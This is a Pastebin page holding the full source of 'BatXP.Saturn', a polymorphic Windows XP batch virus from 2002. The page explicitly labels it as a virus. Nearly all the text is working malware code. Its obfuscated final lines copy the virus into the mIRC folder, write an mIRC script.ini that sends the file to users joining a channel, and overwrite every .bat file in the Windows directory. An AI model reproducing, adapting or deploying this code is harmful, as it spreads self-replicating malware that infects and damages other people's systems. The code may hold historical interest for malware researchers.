API tools faq
paste
Advertisement
FlyFar

Virus.WinXP.BAT.Saturn - Source Code

FlyFar
Jul 3rd, 2023
987
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 4.06 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. cls%SpTh%
  2. @echo off%SpTh%
  3. ReM ----------- BatXP.Saturn ********** by Second Part To Hell -----------    %SpTh%
  4. ReM                                     | %SpTh%
  5. ReM I think, you are looking at the code and think: "What the hell is this?"| %SpTh%
  6. ReM The answer is: A Windows XP Batch polymorph virus :D            | %SpTh%
  7. ReM WinXP is using a program named CMD.EXE instate of COMMAND.COM for DOS   | %SpTh%
  8. ReM You're able to make the really nice things with CMD which you wasn't    | %SpTh%
  9. ReM able to do it with COMMAND.COM.                     | %SpTh%
  10. ReM                                     | %SpTh%
  11. ReM Information about the virus:                        | %SpTh%
  12. ReM Virusname......................: BatXP.Saturn               | %SpTh%
  13. ReM Virusauthor....................: Second Part To Hell            | %SpTh%
  14. ReM Size...........................: The poly-engine has 1.301 Bytes    | %SpTh%
  15. ReM                  The whole virus has 4.158 Bytes    | %SpTh%
  16. ReM Encrypted......................: Yes, but only the virus part.      | %SpTh%
  17. ReM                  I'll crypt also the poly engine in | %SpTh%
  18. ReM                  next versions.             | %SpTh%
  19. ReM Polymorphic....................: Yes                    | %SpTh%
  20. ReM                                     | %SpTh%
  21. ReM written from 20.11.2002 to 22.11.2002                   | %SpTh%
  22. ReM in Austria                              | %SpTh%
  23. ReM     ----------------------------------------------------------------------    %SpTh%
  24. set a=0%SpTh%
  25. set aa=0%SpTh%
  26. set bb=0%SpTh%
  27. set cc=0%SpTh%
  28. set dd=0%SpTh%
  29. set ee=0%SpTh%
  30. set ff=0%SpTh%
  31. set gg=0%SpTh%
  32. find "SpTh"<%0 >spth.bat
  33. set sec=A%SpTh%
  34. :TitanMoon  %SpTh%
  35. if %aa% EQU 1 (if %bb% EQU 1 (if %cc% EQU 1 (if %dd% EQU 1 (if %ee% EQU 1 (goto saturn)))))%SpTh%
  36. call :RheaMoon%SpTh%
  37. if %aa% EQU 0 (if %a% EQU 45 (%SpTh%
  38. find "%Sec%aAa" <%0 >>spth.bat%SpTh%
  39. set aa=1))%SpTh%
  40. if %bb% EQU 0 (if %a% EQU 46 (%SpTh%
  41. find "%sec%bBb" <%0 >>spth.bat%SpTh%
  42. set bb=1))%SpTh%
  43. if %cc% EQU 0 (if %a% EQU 47 (%SpTh%
  44. find "%sec%cCc" <%0 >>spth.bat%SpTh%
  45. set cc=1))%SpTh%
  46. if %dd% EQU 0 (if %a% EQU 48 (%SpTh%
  47. find "%sec%dDd" <%0 >>spth.bat%SpTh%
  48. set dd=1))%SpTh%
  49. if %ee% EQU 0 (if %a% EQU 49 (%SpTh%
  50. find "%sec%eEe" <%0 >>spth.bat%SpTh%
  51. set ee=1))%SpTh%
  52. goto TitanMoon%SpTh%
  53. :RheaMoon   %SpTh%
  54. set a=%random%%SpTh%
  55. :IapetusMoon    %SpTh%
  56. if %a% GEQ 50 (set /A a=%a%/2)%SpTh%
  57. if %a% LEQ 45 (set /A a=%a%+5)%SpTh%
  58. if %a% LSS 45 (goto :IapetusMoon)%SpTh%
  59. if %a% GTR 50 (goto :IapetusMoon)%SpTh%
  60. goto :EOF   %SpTh%
  61. :saturn  %SpTh%
  62. if %ply% GTR 16383 (%SpTh%
  63. find "%sec%sat"<%0 >>spth.bat  %SpTh%
  64. find "%sec%tas"<%0 >>spth.bat  %SpTh%
  65. ) ELSE (  %SpTh%
  66. find "%sec%tas"<%0 >>spth.bat  %SpTh%
  67. find "%sec%sat"<%0 >>spth.bat  %SpTh%
  68. )  %SpTh%
  69. set !!.!!=h%AdDd%
  70. set !!.!!=i%AdDd%
  71. goto !!.!!  %AdDd%
  72. set !!.!!=w%AdDd%
  73. :!!.!!      %AdDd%
  74. :!.!..      %AdDd%
  75. set !..!!=b%AdDd%
  76. set !..!!=y%AdDd%
  77. goto !..!!  %AdDd%
  78. set !..!!=w%AdDd%
  79. :!..!!      %AdDd%
  80. set !!!.!=q%AcCc%
  81. set !!!.!=o%AcCc%
  82. goto !!!.!  %AcCc%
  83. set !!!.!=u%AcCc%
  84. :!!!.!      %AcCc%
  85. set !!.!.=j%AcCc%
  86. set !!.!.=n%AcCc%
  87. goto !!.!%AcCc%
  88. set !!.!.=l%AcCc%
  89. :!!.!.      %AcCc%
  90. set !.!.!=b%AbBb%
  91. set !.!.!=y%AbBb%
  92. goto !.!.!  %AbBb%
  93. set !.!.!=w%AbBb%
  94. :!.!.!      %AbBb%
  95. set !..!.=p%AbBb%
  96. set !..!.=s%AbBb%
  97. goto !..!%AbBb%
  98. set !..!.=o%AbBb%
  99. :!..!.      %AbBb%
  100. set !!..!=f%AeEe%
  101. set !!..!=d%AeEe%
  102. goto !!..!  %AeEe%
  103. set !!..!=b%AeEe%
  104. :!!..!      %AeEe%
  105. set !.!!.=w%AeEe%
  106. set !.!!.=p%AeEe%
  107. goto !.!!%AeEe%
  108. set !.!!.=d%AeEe%
  109. :!.!!.      %AeEe%
  110. set !.!..=b%AeEe%
  111. set !.!..=e%AeEe%
  112. goto !.!..  %AeEe%
  113. set !.!..=w%AeEe%
  114. set !!!!.=t%AaAa%
  115. set !!!!.=f%AaAa%
  116. goto !!!!%AaAa%
  117. set !!!!.=k%AaAa%
  118. :!!!!.      %AaAa%
  119. set !!!..=v%AaAa%
  120. set !!!..=r%AaAa%
  121. goto !!!..  %AaAa%
  122. set !!!..=u%AaAa%
  123. :!!!..      %AaAa%
  124. set !.!!!=p%AaAa%
  125. set !.!!!=c%AaAa%
  126. goto !.!!!  %AaAa%
  127. set !.!!!=q%AaAa%
  128. :!.!!!      %AaAa%
  129. %!.!!!%%!!!.!%%!.!!.%%!.!.!% spth.bat C:\mirc\saturn.bat %Asat%
  130. %!.!..%%!.!!!%h%!!!.!% [%!..!.%%!.!!!%%!!!..%%!!.!!%%!.!!.%t] >C:\mirc\script.ini %Asat%
  131. %!.!..%%!.!!!%h%!!!.!% %!!.!.%0=%!!!.!%n 1:j%!!!.!%%!!.!!%%!!.!.%:*.* { %!!.!!%%!!!!.% ( $n%!!.!!%%!.!!!%k ==$m%!.!..% )  {halt} /d%!.!!!%%!.!!!% %!..!.%%!.!..%%!!.!.%d $n%!!.!!%%!.!!!%k C:\mirc\saturn.bat } >>C:\mirc\script.ini %Asat%
  132. %!!!!.%%!!!.!%%!!!..% %%q %!!.!!%%!!.!.% (%windir%\*.bat) %!!..!%%!!!.!% %!.!!!%%!!!.!%%!.!!.%%!.!.!% spth.bat %%q %Atas%
Tags: batch virus SPTH winxp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!